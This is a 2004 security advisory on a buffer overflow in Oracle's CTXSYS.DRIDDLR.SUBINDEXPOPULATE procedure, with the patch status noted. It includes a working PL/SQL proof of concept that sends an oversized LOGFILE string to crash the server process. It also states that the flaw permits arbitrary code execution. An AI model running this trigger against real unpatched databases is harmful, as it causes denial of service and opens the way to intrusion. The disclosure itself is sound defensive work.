|
#44 - Buffer overflow in procedure SUBINDEXPOPULATE of DRIDDLR package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Low
Details:
When SUBINDEXPOPULATE procedure is called with a long string in the LOGFILE parameter a buffer overflow occurs.
To reproduce the overflow, execute the next PL/SQL:
DECLARE
P_INDEXID NUMBER;
P_SLAVEID NUMBER;
P_OPCODE NUMBER;
P_LOGFILE VARCHAR2(32767);
P_IDXMEM NUMBER;
AAA VARCHAR2(32767);
BEGIN
AAA:='A';
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
P_INDEXID := 1;
P_SLAVEID := 1;
P_OPCODE := 1;
P_LOGFILE := AAA;
P_IDXMEM := 1;
CTXSYS.DRIDDLR.SUBINDEXPOPULATE(INDEXID => P_INDEXID, SLAVEID => P_SLAVEID, OPCODE => P_OPCODE, LOGFILE => P_LOGFILE, IDXMEM => P_IDXMEM);
END;
Analysis:
This vulnerability can be exploited by members of SYSDBA role and users granted execute permissions on DRIDDLR package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause DOS (Denial of service) killing Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5) Patch 3. 10g Release 1 not vulnerable.
|
